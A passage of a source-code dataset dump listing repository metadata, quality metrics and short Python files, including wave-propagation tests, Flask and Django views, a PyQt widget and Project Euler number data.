hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
368572a119fa4f6ce809593971ccc84e309ef4bb
| 85
|
py
|
Python
|
node_editor/dataframe_model/header_names_view.py
|
lcopey/node_editor
|
04d56ae4c7f2149e46903d5dd2e46f3906ef69e6
|
[
"MIT"
] | 1
|
2021-04-30T11:28:42.000Z
|
2021-04-30T11:28:42.000Z
|
node_editor/dataframe_model/header_names_view.py
|
lcopey/node_editor
|
04d56ae4c7f2149e46903d5dd2e46f3906ef69e6
|
[
"MIT"
] | null | null | null |
node_editor/dataframe_model/header_names_view.py
|
lcopey/node_editor
|
04d56ae4c7f2149e46903d5dd2e46f3906ef69e6
|
[
"MIT"
] | null | null | null |
from PyQt5.QtWidgets import QTableView
class HeaderNamesView(QTableView):
pass
| 14.166667
| 38
| 0.8
| 9
| 85
| 7.555556
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013889
| 0.152941
| 85
| 5
| 39
| 17
| 0.930556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
36c324a00b6440488e8f4bc409e36ca42a9462e3
| 97
|
py
|
Python
|
path_based/__init__.py
|
lcit/metrics_delin
|
30f1ad9ccc901e63770f39a80b0e1ec6bbfb34d9
|
[
"MIT"
] | 8
|
2021-01-25T07:34:04.000Z
|
2022-03-18T10:29:20.000Z
|
path_based/__init__.py
|
lcit/metrics_delin
|
30f1ad9ccc901e63770f39a80b0e1ec6bbfb34d9
|
[
"MIT"
] | null | null | null |
path_based/__init__.py
|
lcit/metrics_delin
|
30f1ad9ccc901e63770f39a80b0e1ec6bbfb34d9
|
[
"MIT"
] | 1
|
2022-01-27T08:12:38.000Z
|
2022-01-27T08:12:38.000Z
|
from .toolong_tooshort_metric import toolong_tooshort
from .path_connectivity_metric import opt_p
| 48.5
| 53
| 0.907216
| 14
| 97
| 5.857143
| 0.642857
| 0.365854
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072165
| 97
| 2
| 54
| 48.5
| 0.911111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
36c964f9784d25d13a864d51ed13e1c9347e79aa
| 8,302
|
py
|
Python
|
propagators/long_running_tests.py
|
mikelytaev/wave-propagation
|
eff0eb1fc843e4d206b05731e40047e1d810d76f
|
[
"MIT"
] | 15
|
2019-06-28T17:05:23.000Z
|
2022-03-22T02:20:39.000Z
|
propagators/long_running_tests.py
|
mikelytaev/wave-propagation
|
eff0eb1fc843e4d206b05731e40047e1d810d76f
|
[
"MIT"
] | null | null | null |
propagators/long_running_tests.py
|
mikelytaev/wave-propagation
|
eff0eb1fc843e4d206b05731e40047e1d810d76f
|
[
"MIT"
] | 3
|
2020-10-10T12:41:19.000Z
|
2021-12-17T14:08:18.000Z
|
import unittest
from propagators.sspade import *
from uwa.source import GaussSource
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
__author__ = 'Lytaev Mikhail (mikelytaev@gmail.com)'
def energy_conservation(f: HelmholtzField, eps=1e-11) -> bool:
norms = np.linalg.norm(f.field, axis=1)
return np.all(np.abs(norms - norms[0]) < eps)
def decaying(arr, eps) -> bool:
return np.all(arr[1::] < arr[:-1:] + eps)
def energy_decaying(f: HelmholtzField, x_start_m=0, eps=1e-7) -> bool:
x_i = abs(f.x_grid_m - x_start_m).argmin()
norms = np.linalg.norm(f.field[x_i::, :], axis=1)
return decaying(norms, eps)
def local_bc(lbc):
env = HelmholtzEnvironment(x_max_m=1000,
z_min=0,
z_max=300,
lower_bc=lbc,
upper_bc=lbc,
use_n2minus1=False,
use_rho=False)
src = GaussSource(freq_hz=1, depth=150, beam_width=15, eval_angle=0)
wavelength = 1
k0 = 2*cm.pi / wavelength
params = HelmholtzPropagatorComputationalParams(exp_pade_order=(7, 8), max_src_angle=src.max_angle(), dz_wl=0.5, dx_wl=50)
propagator = HelmholtzPadeSolver(env=env, wavelength=wavelength, freq_hz=300e6, params=params)
initials_fw = [np.empty(0)] * propagator.n_x
initials_fw[0] = np.array([src.aperture(k0, z) for z in propagator.z_computational_grid])
f, r = propagator._propagate(initials=initials_fw, direction=1)
# plt.imshow(10*np.log10(np.abs(f.field.T[::-1, :])), cmap=plt.get_cmap('jet'), norm=Normalize(-50, 10))
# plt.colorbar(fraction=0.046, pad=0.04)
# plt.show()
return f
def transparent_const_bc(src):
env = HelmholtzEnvironment(x_max_m=5000,
z_min=0,
z_max=300,
lower_bc=TransparentBC(),
upper_bc=TransparentBC(),
use_n2minus1=False,
use_rho=False
)
wavelength = 0.1
k0 = 2 * cm.pi / wavelength
params = HelmholtzPropagatorComputationalParams(exp_pade_order=(7, 8),
max_src_angle=src.max_angle(),
dz_wl=0.5,
dx_wl=50,
inv_z_transform_rtol=1e-11
)
propagator = HelmholtzPadeSolver(env=env, wavelength=wavelength, freq_hz=300e6, params=params)
initials_fw = [np.empty(0)] * propagator.n_x
initials_fw[0] = np.array([src.aperture(k0, z) for z in propagator.z_computational_grid])
f, r = propagator._propagate(initials=initials_fw, direction=1)
# plt.imshow(10 * np.log10(np.abs(f.field.T[::-1, :])), cmap=plt.get_cmap('jet'), norm=Normalize(-50, 10))
# plt.colorbar(fraction=0.046, pad=0.04)
# plt.show()
return f
def transparent_const_bc_cn(src):
env = HelmholtzEnvironment(x_max_m=5000,
z_min=0,
z_max=300,
lower_bc=TransparentBC(),
upper_bc=TransparentBC(),
use_n2minus1=False,
use_rho=False)
wavelength = 0.1
k0 = 2 * cm.pi / wavelength
params = HelmholtzPropagatorComputationalParams(exp_pade_order=(1, 1),
dx_wl=1,
dz_wl=0.1,
max_src_angle=src.max_angle()
)
propagator = HelmholtzPadeSolver(env=env, wavelength=wavelength, freq_hz=300e6, params=params)
initials_fw = [np.empty(0)] * propagator.n_x
initials_fw[0] = np.array([src.aperture(k0, z) for z in propagator.z_computational_grid])
f, r = propagator._propagate(initials=initials_fw, direction=1)
# plt.imshow(10 * np.log10(np.abs(f.field.T[::-1, :])), cmap=plt.get_cmap('jet'), norm=Normalize(-50, 10))
# plt.colorbar(fraction=0.046, pad=0.04)
# plt.show()
return f
class HelmholtzPropagatorTest(unittest.TestCase):
def test_Dirichlet(self):
#logging.basicConfig(level=logging.DEBUG)
f = local_bc(RobinBC(1, 0, 0))
self.assertTrue(energy_conservation(f, eps=1e-11))
def test_Neumann(self):
#logging.basicConfig(level=logging.DEBUG)
f = local_bc(RobinBC(0, 1, 0))
self.assertTrue(energy_conservation(f, eps=1e-2))
def test_transparent_const(self):
#logging.basicConfig(level=logging.DEBUG)
src = GaussSource(freq_hz=1, depth=150, beam_width=15, eval_angle=0)
f = transparent_const_bc(src)
self.assertTrue(energy_decaying(f, x_start_m=20))
def test_transparent_const_lower(self):
#logging.basicConfig(level=logging.DEBUG)
src = GaussSource(freq_hz=1, depth=150, beam_width=2, eval_angle=10)
f = transparent_const_bc(src)
self.assertTrue(energy_decaying(f, x_start_m=20))
self.assertTrue(np.linalg.norm(f.field[-1, :]) < 5e-11)
def test_transparent_const_upper(self):
#logging.basicConfig(level=logging.DEBUG)
src = GaussSource(freq_hz=1, depth=150, beam_width=2, eval_angle=-10)
f = transparent_const_bc(src)
self.assertTrue(energy_decaying(f, x_start_m=20))
self.assertTrue(np.linalg.norm(f.field[-1, :]) < 5e-11)
def test_transparent_const_lower_cn(self):
#logging.basicConfig(level=logging.DEBUG)
src = GaussSource(freq_hz=1, depth=150, beam_width=2, eval_angle=10)
f = transparent_const_bc_cn(src)
self.assertTrue(energy_decaying(f, x_start_m=20))
self.assertTrue(np.linalg.norm(f.field[-1, :]) < 1e-5)
def test_transparent_const_upper_cn(self):
#logging.basicConfig(level=logging.DEBUG)
src = GaussSource(freq_hz=1, depth=150, beam_width=2, eval_angle=-10)
f = transparent_const_bc_cn(src)
self.assertTrue(energy_decaying(f, x_start_m=20))
self.assertTrue(np.linalg.norm(f.field[-1, :]) < 1e-5)
def test_nlbc_storage(self):
#logging.basicConfig(level=logging.DEBUG)
nlbc_file_name = 'nlbc'
import os
if os.path.isfile(nlbc_file_name):
os.remove(nlbc_file_name)
env = HelmholtzEnvironment(x_max_m=5000,
z_min=0,
z_max=300,
lower_bc=TransparentBC(),
upper_bc=TransparentBC(),
use_n2minus1=False,
use_rho=False
)
wavelength = 0.1
src = GaussSource(freq_hz=1, depth=150, beam_width=15, eval_angle=0)
k0 = 2 * cm.pi / wavelength
params = HelmholtzPropagatorComputationalParams(exp_pade_order=(7, 8),
max_src_angle=src.max_angle(),
dz_wl=0.5,
dx_wl=50,
inv_z_transform_rtol=1e-11,
storage=PickleStorage(nlbc_file_name)
)
propagator = HelmholtzPadeSolver(env=env, wavelength=wavelength, freq_hz=300e6, params=params)
initials_fw = [np.empty(0)] * propagator.n_x
initials_fw[0] = np.array([src.aperture(k0, z) for z in propagator.z_computational_grid])
f1, r = propagator._propagate(initials=initials_fw, direction=1)
f2, r = propagator._propagate(initials=initials_fw, direction=1)
self.assertTrue(os.path.isfile(nlbc_file_name))
self.assertTrue(np.linalg.norm(f1.field - f2.field) < 1e-11)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
HelmholtzPropagatorTest.main()
| 43.465969
| 126
| 0.560106
| 992
| 8,302
| 4.472782
| 0.15625
| 0.029299
| 0.046653
| 0.060852
| 0.838179
| 0.804372
| 0.763354
| 0.763354
| 0.719856
| 0.719856
| 0
| 0.047987
| 0.3298
| 8,302
| 190
| 127
| 43.694737
| 0.749461
| 0.094194
| 0
| 0.572464
| 0
| 0
| 0.006532
| 0.002933
| 0
| 0
| 0
| 0
| 0.094203
| 1
| 0.101449
| false
| 0
| 0.043478
| 0.007246
| 0.195652
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
36cc99af8b9d31de772788fc0952fd5f6f48a2b7
| 80
|
py
|
Python
|
katas/kyu_7/boiled_eggs.py
|
the-zebulan/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 40
|
2016-03-09T12:26:20.000Z
|
2022-03-23T08:44:51.000Z
|
katas/kyu_7/boiled_eggs.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | null | null | null |
katas/kyu_7/boiled_eggs.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 36
|
2016-11-07T19:59:58.000Z
|
2022-03-31T11:18:27.000Z
|
from math import ceil
def cooking_time(eggs):
return ceil(eggs / 8.0) * 5
| 13.333333
| 31
| 0.675
| 14
| 80
| 3.785714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048387
| 0.225
| 80
| 5
| 32
| 16
| 0.806452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
36df3946cd8c5d4d13c1906cf45678544ea52cce
| 4,025
|
py
|
Python
|
tests/networks/test_utils.py
|
garaytc/reinforcement
|
e6af258bf2ac3b45c20e0ed3d2f58ca7bc2b232f
|
[
"Apache-2.0"
] | 12
|
2020-05-19T18:58:55.000Z
|
2021-02-21T20:26:46.000Z
|
tests/networks/test_utils.py
|
garaytc/reinforcement
|
e6af258bf2ac3b45c20e0ed3d2f58ca7bc2b232f
|
[
"Apache-2.0"
] | 39
|
2020-05-19T18:41:42.000Z
|
2021-01-16T08:31:06.000Z
|
tests/networks/test_utils.py
|
garaytc/reinforcement
|
e6af258bf2ac3b45c20e0ed3d2f58ca7bc2b232f
|
[
"Apache-2.0"
] | 2
|
2020-05-19T15:15:04.000Z
|
2020-05-21T08:45:59.000Z
|
from blobrl.networks import get_last_layers
from gym.spaces import Box, Discrete, MultiDiscrete, MultiBinary, Tuple, Dict
import torch.nn as nn
def valid_dim(out_v, out_g):
if isinstance(out_v, list):
assert len(out_v) == len(out_g)
for o, g in zip(out_v, out_g):
valid_dim(o, g)
else:
assert len(out_v.state_dict()) == len(out_g.state_dict())
def test_get_last_layers():
in_values = [
Discrete(10),
Discrete(1),
Discrete(100),
Discrete(5),
MultiDiscrete([1]),
MultiDiscrete([10, 110, 3, 50]),
MultiDiscrete([1, 1, 1]),
MultiDiscrete([100, 3, 3, 5]),
MultiDiscrete([[100, 3], [3, 5]]),
MultiDiscrete([[[100, 3], [3, 5]], [[100, 3], [3, 5]]]),
MultiBinary(1),
MultiBinary(3),
MultiBinary([3, 2]),
Box(low=0, high=10, shape=[1]),
Box(low=0, high=10, shape=[2, 2]),
Box(low=0, high=10, shape=[2, 2, 2]),
Tuple([Discrete(1), MultiDiscrete([1, 1])]),
Dict({"first": Discrete(1), "second": MultiDiscrete([1, 1])})
]
out_values = [
nn.Linear(10, 10),
nn.Linear(10, 1),
nn.Linear(10, 100),
nn.Linear(10, 5),
[nn.Sequential(*[nn.Linear(10, 10), nn.Softmax()])],
[nn.Sequential(*[nn.Linear(10, 10), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 110), nn.Softmax()]),
nn.Sequential(*[nn.Linear(10, 3), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 50), nn.Softmax()])],
[nn.Sequential(*[nn.Linear(10, 1), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 1), nn.Softmax()]),
nn.Sequential(*[nn.Linear(10, 1), nn.Softmax()])],
[nn.Sequential(*[nn.Linear(10, 100), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 3), nn.Softmax()]),
nn.Sequential(*[nn.Linear(10, 3), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 5), nn.Softmax()])],
[[nn.Sequential(*[nn.Linear(10, 100), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 3), nn.Softmax()])],
[nn.Sequential(*[nn.Linear(10, 3), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 5), nn.Softmax()])]],
[
[[nn.Sequential(*[nn.Linear(10, 100), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 3), nn.Softmax()])],
[nn.Sequential(*[nn.Linear(10, 3), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 5), nn.Softmax()])]],
[[nn.Sequential(*[nn.Linear(10, 100), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 3), nn.Softmax()])],
[nn.Sequential(*[nn.Linear(10, 3), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 5), nn.Softmax()])]]
],
[nn.Sequential(*[nn.Linear(10, 1), nn.Sigmoid()])],
[nn.Sequential(*[nn.Linear(10, 1), nn.Sigmoid()]),
nn.Sequential(*[nn.Linear(10, 1), nn.Sigmoid()]),
nn.Sequential(*[nn.Linear(10, 1), nn.Sigmoid()])],
[
[nn.Sequential(*[nn.Linear(10, 1), nn.Sigmoid()]),
nn.Sequential(*[nn.Linear(10, 1), nn.Sigmoid()])],
[nn.Sequential(*[nn.Linear(10, 1), nn.Sigmoid()]),
nn.Sequential(*[nn.Linear(10, 1), nn.Sigmoid()])],
[nn.Sequential(*[nn.Linear(10, 1), nn.Sigmoid()]),
nn.Sequential(*[nn.Linear(10, 1), nn.Sigmoid()])]
],
[nn.Linear(10, 1)]
,
[[nn.Linear(10, 1), nn.Linear(10, 1)], [nn.Linear(10, 1), nn.Linear(10, 1)]]
,
[[[nn.Linear(10, 1), nn.Linear(10, 1)], [nn.Linear(10, 1), nn.Linear(10, 1)]],
[[nn.Linear(10, 1), nn.Linear(10, 1)], [nn.Linear(10, 1), nn.Linear(10, 1)]]],
[nn.Linear(10, 1),
[nn.Sequential(*[nn.Linear(10, 1), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 1), nn.Softmax()])]],
[nn.Linear(10, 1),
[nn.Sequential(*[nn.Linear(10, 1), nn.Softmax()]), nn.Sequential(*[nn.Linear(10, 1), nn.Softmax()])]],
]
for in_value, out_value in zip(in_values, out_values):
out_value_gen = get_last_layers(in_value, 10)
valid_dim(out_value, out_value_gen)
| 40.656566
| 116
| 0.540373
| 565
| 4,025
| 3.79115
| 0.100885
| 0.212885
| 0.266106
| 0.354809
| 0.724556
| 0.712418
| 0.712418
| 0.693744
| 0.67507
| 0.67507
| 0
| 0.082214
| 0.223354
| 4,025
| 98
| 117
| 41.071429
| 0.603007
| 0
| 0
| 0.233766
| 0
| 0
| 0.002733
| 0
| 0
| 0
| 0
| 0
| 0.025974
| 1
| 0.025974
| false
| 0
| 0.038961
| 0
| 0.064935
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
36f646fd7d40e58f4c7556edac5f53ae1feaa53d
| 114
|
py
|
Python
|
microweb/app/views.py
|
irr/python-labs
|
43bb3a528c151653b2be832c7ff13240a10e18a4
|
[
"Apache-2.0"
] | 4
|
2015-11-25T09:06:44.000Z
|
2019-12-11T21:35:21.000Z
|
microweb/app/views.py
|
irr/python-labs
|
43bb3a528c151653b2be832c7ff13240a10e18a4
|
[
"Apache-2.0"
] | null | null | null |
microweb/app/views.py
|
irr/python-labs
|
43bb3a528c151653b2be832c7ff13240a10e18a4
|
[
"Apache-2.0"
] | 2
|
2015-11-25T09:19:38.000Z
|
2016-02-26T03:54:06.000Z
|
from app import microweb
@microweb.route('/')
@microweb.route('/index')
def index():
return "Hello, World!"
| 14.25
| 26
| 0.666667
| 14
| 114
| 5.428571
| 0.714286
| 0.342105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149123
| 114
| 7
| 27
| 16.285714
| 0.783505
| 0
| 0
| 0
| 0
| 0
| 0.175439
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.2
| 0.2
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
7fd2df523f7ae9a39baacd5bc20d841dfac5978e
| 233
|
py
|
Python
|
DJANGO/produtos/views.py
|
DjCod3r/PythonScripts
|
95e70ebb81d2bc37b0283daff8ee723c5d2a382c
|
[
"MIT"
] | null | null | null |
DJANGO/produtos/views.py
|
DjCod3r/PythonScripts
|
95e70ebb81d2bc37b0283daff8ee723c5d2a382c
|
[
"MIT"
] | null | null | null |
DJANGO/produtos/views.py
|
DjCod3r/PythonScripts
|
95e70ebb81d2bc37b0283daff8ee723c5d2a382c
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(request):
return render (request, 'produtos/index.html')
| 25.888889
| 50
| 0.785408
| 32
| 233
| 5.71875
| 0.53125
| 0.163934
| 0.20765
| 0.273224
| 0.338798
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141631
| 233
| 9
| 50
| 25.888889
| 0.915
| 0.201717
| 0
| 0.4
| 0
| 0
| 0.103261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.6
| 0.2
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
7fe5335dc0dcb61fe4407ae96728ccc86eee9ffd
| 114
|
py
|
Python
|
Utils/__init__.py
|
alirezakazemipour/A3C-ACER-PyTorch
|
cd2ffbd52137a2677fd85c2890f378992fc82340
|
[
"MIT"
] | null | null | null |
Utils/__init__.py
|
alirezakazemipour/A3C-ACER-PyTorch
|
cd2ffbd52137a2677fd85c2890f378992fc82340
|
[
"MIT"
] | null | null | null |
Utils/__init__.py
|
alirezakazemipour/A3C-ACER-PyTorch
|
cd2ffbd52137a2677fd85c2890f378992fc82340
|
[
"MIT"
] | null | null | null |
from .atari_wrappers import make_atari
from .utils import make_state
from .logger import *
from .play import Play
| 22.8
| 38
| 0.815789
| 18
| 114
| 5
| 0.5
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140351
| 114
| 4
| 39
| 28.5
| 0.918367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7fefc276ceaaf8313dbe8746a8643c641af92570
| 5,260
|
py
|
Python
|
p013.py
|
scottwillmoore/project-euler
|
e8b24a72d88fc30e8ab701e2f56622c363600ea4
|
[
"MIT"
] | 1
|
2018-07-09T09:19:58.000Z
|
2018-07-09T09:19:58.000Z
|
p013.py
|
scottwillmoore/project-euler
|
e8b24a72d88fc30e8ab701e2f56622c363600ea4
|
[
"MIT"
] | null | null | null |
p013.py
|
scottwillmoore/project-euler
|
e8b24a72d88fc30e8ab701e2f56622c363600ea4
|
[
"MIT"
] | null | null | null |
data = """
37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
